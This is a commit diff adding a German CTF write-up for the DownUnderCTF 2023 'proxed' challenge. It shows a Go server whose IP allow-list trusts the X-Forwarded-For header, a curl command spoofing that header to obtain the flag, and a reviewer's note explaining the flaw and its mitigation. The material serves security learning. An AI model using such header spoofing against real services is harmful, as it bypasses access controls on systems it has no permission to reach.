htb updates and ductf update
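--- /dev/null
+++ b/DownUnderCTF 2023/beginner/proxed/README.md
@@ -0,0 +1,58 @@
+Go Source:
+
+```go
+package main
+
+import (
+"flag"
+"fmt"
+"log"
+"net/http"
+"os"
+"strings"
+)
+
+var (
+port = flag.Int("port", 8081, "The port to listen on")
+)
+
+func main() {
+
+flag.Parse()
+
+http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
+xff := r.Header.Values("X-Forwarded-For")
+
+ip := strings.Split(r.RemoteAddr, ":")[0]
+
+if xff != nil {
+ips := strings.Split(xff[len(xff)-1], ", ")
+ip = ips[len(ips)-1]
+ip = strings.TrimSpace(ip)
+}
+
+if ip != "31.33.33.7" {
+message := fmt.Sprintf("untrusted IP: %s", ip)
+http.Error(w, message, http.StatusForbidden)
+return
+} else {
+w.Write([]byte(os.Getenv("FLAG")))
+}
+})
+
+log.Printf("Listening on port %d", *port)
+log.Fatal(http.ListenAndServe(fmt.Sprintf(":%d", *port), nil))
+}
+
+```
+
+Es ist ziemlich eindeutig, dass man seine IP Adresse spoofen soll, um die Flagge aus den ENV vars zu lesen.
+
+Ein hilfreicher Stack-Overflow Beitrag hilft dabei: https://stackoverflow.com/questions/5188584/how-can-i-spoof-the-sender-ip-address-using-curl
+
+=> SOLVED
+```bash
+┌──(kali㉿kali)-[/ctf/DownUnderCTF 2023/beginner/static file server]
+└─$ curl --header "X-Forwarded-For: 31.33.33.7" http://proxed.duc.tf:30019/
+DUCTF{17_533m5_w3_f0rg07_70_pr0x}
+```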
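Review bot: The write-up never states the root cause, so a reader learns the curl invocation but not the lesson. The handler replaces the address taken from `r.RemoteAddr` with the last `X-Forwarded-For` entry whenever that header is present, so with no trusted proxy overwriting the header the `ip != "31.33.33.7"` allow-list check is decided entirely by client-supplied data. I would add one sentence after the Go listing saying this, plus the mitigation: authorise on the transport peer address and honour `X-Forwarded-For` only when that peer is a known reverse proxy. It is also worth noting that `strings.Split(r.RemoteAddr, ":")[0]` mis-parses IPv6 peers and `net.SplitHostPort` is the correct way to extract the host. Separately, the shell prompt in the transcript shows the `static file server` directory rather than `proxed`, which looks like a copy-paste leftover.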